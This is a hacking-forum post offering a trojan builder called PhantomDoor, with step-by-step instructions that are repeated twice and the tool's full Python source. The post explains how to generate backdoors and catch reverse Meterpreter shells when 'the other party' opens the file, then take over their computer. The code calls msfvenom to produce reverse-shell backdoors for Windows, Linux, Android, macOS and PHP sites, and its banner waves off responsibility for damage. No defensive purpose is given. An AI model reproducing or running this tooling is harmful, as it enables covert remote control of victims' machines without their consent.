πTrojan builder for Linuxπ 03-03-2021, 01:29 PM
#1
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
cd PhantomDoor
python PhantomDoor.py
After this process, we choose the 1st option.
here you will choose which operating system to create trojan horse for
After selecting it, you will write your ip address instead of LHOST. Open a new terminal and ifconfig to find out your IP address
but if you are not root user, type sudo ifconfig so you can find your ip address
Enter a port instead of LPORT
After these processes, your trojan will be prepared.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
After typing show options
LHOST ip address you set
your set LPORT port
and say run the program and run it
You will receive a link when the other party opens the program.
After the connection is established, you can say 1st session and enter the other party's computer and do everything.
DownloadΒ Link
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
cd PhantomDoor
python PhantomDoor.py
After this process, we choose the 1st option.
here you will choose which operating system to create trojan horse for
After selecting it, you will write your ip address instead of LHOST. Open a new terminal and ifconfig to find out your IP address
but if you are not root user, type sudo ifconfig so you can find your ip address
Enter a port instead of LPORT
After these processes, your trojan will be prepared.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
After typing show options
LHOST ip address you set
your set LPORT port
and say run the program and run it
You will receive a link when the other party opens the program.
After the connection is established, you can say 1st session and enter the other party's computer and do everything.
DownloadΒ Link
Code:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import socket
sys.path.append('core/')
from listener import *
print("""
_____________________________________________________________
|Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β ^^^^^^^^\ |
| LEGAL WARNING: While this may be helpful forΒ Β Β |Β Β Β | |
| some, there are significant risks. You areΒ Β Β Β |_ __Β | |
| hereby allowed to cause havoc with this butΒ Β Β (.(. )Β | |
| the coder won't be held responsible forΒ _Β Β Β (_Β Β Β ) |
| any damage you cause :) if you get inΒ Β \\Β Β Β /___/'Β / |Β
| trouble I don't care :)Β Β Β Β Β Β Β Β Β _\\_Β Β Β \Β Β |Β |
| [!] READ terms.txt BEFORE STARTING!Β Β Β ((Β )Β Β /====|Β |
|Β Β Β HAPPY HACKING TO ALL :)Β Β Β Β Β Β Β \Β <.__._-Β Β Β \ |
|___________________________________________ /___.Β Β Β Β ||
[---]Β Β Β Β Β PhantomDoor Backdoor Generator and ListenerΒ Β Β Β Β Β Β Β [---]
[---]Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β [---]
[---]Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β [---]
[---]Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β [---]
[---]Β Β Β Β Β Β Β Β Β [---]
[---]Β Β Β Β Β Β Β Β Β [---]
[---]Β Β Β Β Β Β Β Design credits to => Zerodoor.py Β Β [---]
1) BackDoors
2) Listener
""")
choice = raw_input("Enter your choice #~:Β ")
if(choice=="1"):
print("""
Β Β Β Β Β ,----------------,Β Β Β Β Β Β Β Β ,---------,
Β Β ,--------------------------,Β Β Β Β ,"Β Β Β Β ," |
Β ,"Β Β Β Β Β Β Β Β Β Β Β ,"Β |Β Β Β ,"Β Β Β Β ,"Β |
+------------------------+ |Β |Β Β ,"Β Β Β Β ,"Β Β |
|Β .--------------------.Β |Β |Β Β +---------+Β Β |
|Β |Β Β Β Β Β Β Β Β Β Β |Β |Β |Β Β | -==----'|Β Β |
|Β |$>wget backdoorsΒ Β |Β |Β |Β Β |Β Β Β Β |Β Β |
|Β | chmod +x backdoors |Β |Β |/----|`---=Β Β |Β Β |
|Β |Β ./backdoors pwnΒ |Β |Β |Β Β |==== ooo |Β Β Β ;
|Β |Β Β Β Β Β Β Β Β Β Β |Β |Β |Β Β |(((( [33]|Β Β ,"
|Β `--------------------'Β |,"Β Β Β | |((((Β |Β ,"
+-----------------------+Β ;;Β Β Β | |Β Β Β |,"Β Β
Β Β /_)______________(_/Β //'Β Β Β +.---------+
Β Β Β ___________________________/___Β
Β Β Β /Β ooooooooooooooooΒ .o.Β oooo /,Β
Β Β / ==ooooooooooooooo==.o.Β ooo= //Β
Β Β /_==__==========__==_ooo__ooo=_/'Β
Β Β `-----------------------------'
Β Β Β Β Β ~ 5 Immersive Backdoors ~
1. Backdoor for Windows
2. Backdoor for Linux
3. Backdoor for Android
4. Backdoor for MacOS
5. Backdoor for Web
Β Β Β """)
bd = raw_input("Which Backdoor You want to generate? #~: ")
if(bd=="1"):
os.system("clear")
os.system("figlet WINDOWS BACKDOOR")
lhost = raw_input("LHOST: ")
lport = raw_input("LPORT: ")
os.system("msfvenom -p windows/meterpreter/reverse_tcp lhost=" + lhost + " lport="Β + lport + " -f exe > /root/Desktop/backdoor.exe")
print("(*) Backdoor generated. Happy Hacking :D")
if(bd=="2"):
os.system("clear")
os.system("figlet LINUX BACKDOOR")
lhost = raw_input("LHOST: ")
lport = raw_input("LPORT: ")
os.system("msfvenom -p python/meterpreter/reverse_tcp lhost=" + lhost + " lport=" + lport + " > /root/Desktop/backdoor.py")
print("(*) Backdoor generated. Happy Hacking :D")
if(bd=="3"):
os.system("clear")
os.system("figlet ANDROID BACKDOOR")
lhost = raw_input("LHOST: ")
lport = raw_input("LPORT: ")
os.system("msfvenom -pΒ android/meterpreter/reverse_tcp lhost=" + lhost + " lport=" + lport + " > /root/Desktop/backdoor.apk")
print("(*) Backdoor generated. Happy Hacking :D")
if(bd=="4"):
os.system("clear")
os.system("figlet MacOS BACKDOOR")
lhost = raw_input("LHOST: ")
lport = raw_input("LPORT: ")
os.system("msfvenom -pΒ java/meterpreter/reverse_tcp lhost=" + lhost + " lport=" + lport + " -f jar > /root/Desktop/backdoor.jar")
print("(*) Backdoor generated. Happy Hacking :D")
if(bd=="5"):
os.system("clear")
os.system("figlet WEB BACKDOOR")
lhost = raw_input("LHOST: ")
lport = raw_input("LPORT: ")
os.system("msfvenom -pΒ php/meterpreter/reverse_tcp lhost= " + lhost + " lport= " + lport + " > /root/Desktop/backdoor.php")
print("(*) Backdoor generated. Happy Hacking :D")
if(choice=="2"):
listener()